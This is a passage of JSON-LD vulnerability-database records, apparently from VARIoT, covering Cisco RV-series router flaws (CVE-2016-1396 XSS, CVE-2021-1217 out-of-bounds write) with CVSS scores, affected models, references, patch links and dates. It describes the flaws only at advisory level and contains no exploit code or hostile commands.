"cve": "CVE-2016-1396",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2016-1396",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2016-04095",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-90215",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2016-1396",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1396",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-1396",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2016-04095",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201606-364",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-90215",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"db": "VULHUB",
"id": "VHN-90215"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-364"
},
{
"db": "NVD",
"id": "CVE-2016-1396"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in the web-based management interface on Cisco RV110W devices with firmware before 1.2.1.7, RV130W devices with firmware before 1.0.3.16, and RV215W devices with firmware before 1.3.0.8 allows remote attackers to inject arbitrary web script or HTML via a crafted parameter, aka Bug ID CSCux82583. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. \nAn attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1396"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"db": "BID",
"id": "91223"
},
{
"db": "VULHUB",
"id": "VHN-90215"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1396",
"trust": 3.4
},
{
"db": "SECTRACK",
"id": "1036114",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003291",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2016-04095",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201606-364",
"trust": 0.6
},
{
"db": "BID",
"id": "91223",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-90215",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"db": "VULHUB",
"id": "VHN-90215"
},
{
"db": "BID",
"id": "91223"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-364"
},
{
"db": "NVD",
"id": "CVE-2016-1396"
}
]
},
"id": "VAR-201606-0432",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"db": "VULHUB",
"id": "VHN-90215"
}
],
"trust": 1.233139435
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04095"
}
]
},
"last_update_date": "2024-11-23T23:09:12.185000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20160615-rv1",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160615-rv1"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90215"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"db": "NVD",
"id": "CVE-2016-1396"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv1"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036114"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1396"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1396"
},
{
"trust": 0.6,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv1/"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"db": "VULHUB",
"id": "VHN-90215"
},
{
"db": "BID",
"id": "91223"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-364"
},
{
"db": "NVD",
"id": "CVE-2016-1396"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"db": "VULHUB",
"id": "VHN-90215"
},
{
"db": "BID",
"id": "91223"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-364"
},
{
"db": "NVD",
"id": "CVE-2016-1396"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"date": "2016-06-19T00:00:00",
"db": "VULHUB",
"id": "VHN-90215"
},
{
"date": "2016-06-15T00:00:00",
"db": "BID",
"id": "91223"
},
{
"date": "2016-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"date": "2016-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-364"
},
{
"date": "2016-06-19T01:59:04.043000",
"db": "NVD",
"id": "CVE-2016-1396"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04095"
},
{
"date": "2016-11-30T00:00:00",
"db": "VULHUB",
"id": "VHN-90215"
},
{
"date": "2016-06-15T00:00:00",
"db": "BID",
"id": "91223"
},
{
"date": "2016-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003291"
},
{
"date": "2016-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-364"
},
{
"date": "2024-11-21T02:46:21.903000",
"db": "NVD",
"id": "CVE-2016-1396"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-364"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco Device product firmware Web -Based scripting interface cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003291"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-364"
}
],
"trust": 0.6
}
}
var-202101-0777
Vulnerability from variot
Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A series router contains an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202101-0777",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv130 vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": null
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
},
{
"model": "rv130 vpn router",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
},
{
"model": "cisco rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.8,
"vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
"version": null
},
{
"model": "rv110w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w no",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41170"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"db": "NVD",
"id": "CVE-2021-1217"
}
]
},
"cve": "CVE-2021-1217",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2021-1217",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2021-41170",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-1217",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-1217",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-1217",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "ykramarz@cisco.com",
"id": "CVE-2021-1217",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-1217",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-41170",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202101-1076",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41170"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"db": "CNNVD",
"id": "CNNVD-202101-1076"
},
{
"db": "NVD",
"id": "CVE-2021-1217"
},
{
"db": "NVD",
"id": "CVE-2021-1217"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities. plural Cisco Small Business RV A series router contains an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Or cause the device to reload",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-1217"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"db": "CNVD",
"id": "CNVD-2021-41170"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-1217",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002548",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-41170",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0232",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0142",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202101-1076",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41170"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"db": "CNNVD",
"id": "CNNVD-202101-1076"
},
{
"db": "NVD",
"id": "CVE-2021-1217"
}
]
},
"id": "VAR-202101-0777",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41170"
}
],
"trust": 1.2739622933333334
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41170"
}
]
},
"last_update_date": "2024-11-23T21:34:54.430000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-rv-overflow-WUnUgv4U",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U"
},
{
"title": "Patch for Cisco RV110W/RV130/RV130W/RV215W remote command execution and denial of service vulnerability (CNVD-2021-41170)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/272291"
},
{
"title": "Multiple Cisco Product access control error vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139177"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41170"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"db": "CNNVD",
"id": "CNNVD-202101-1076"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Out-of-bounds writing (CWE-787) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"db": "NVD",
"id": "CVE-2021-1217"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-overflow-wunugv4u"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-1217"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0142/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.0232/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-41170"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"db": "CNNVD",
"id": "CNNVD-202101-1076"
},
{
"db": "NVD",
"id": "CVE-2021-1217"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-41170"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"db": "CNNVD",
"id": "CNNVD-202101-1076"
},
{
"db": "NVD",
"id": "CVE-2021-1217"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-41170"
},
{
"date": "2021-09-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"date": "2021-01-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202101-1076"
},
{
"date": "2021-01-13T22:15:20.257000",
"db": "NVD",
"id": "CVE-2021-1217"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-06-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-41170"
},
{
"date": "2021-09-22T08:52:00",
"db": "JVNDB",
"id": "JVNDB-2021-002548"
},
{
"date": "2021-01-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202101-1076"
},
{
"date": "2024-11-21T05:43:51.143000",
"db": "NVD",
"id": "CVE-2021-1217"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202101-1076"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Out-of-bounds write vulnerability in series routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002548"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202101-1076"
}
],
"trust": 0.6
}
}
var-201906-0688
Vulnerability from variot
A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to disconnect clients that are connected to the guest network on an affected router. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for device disconnection and providing the connected device information. A successful exploit could allow the attacker to deny service to specific clients that are connected to the guest network. Cisco RV110W , RV130W , RV215W There is an authorization vulnerability in the router.Service operation interruption (DoS) There is a possibility of being put into a state. The Cisco\302\256 RV110W and so on are all VPN firewall routers from Cisco. The vulnerability stems from a program failing to properly authorize an HTTP request, which can be exploited by a remote attacker to cause a denial of service. An attacker can leverage this issue to cause denial of service condition. This issue is being tracked by Cisco Bug IDs CSCvo65045, CSCvo65048, CSCvo65050
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
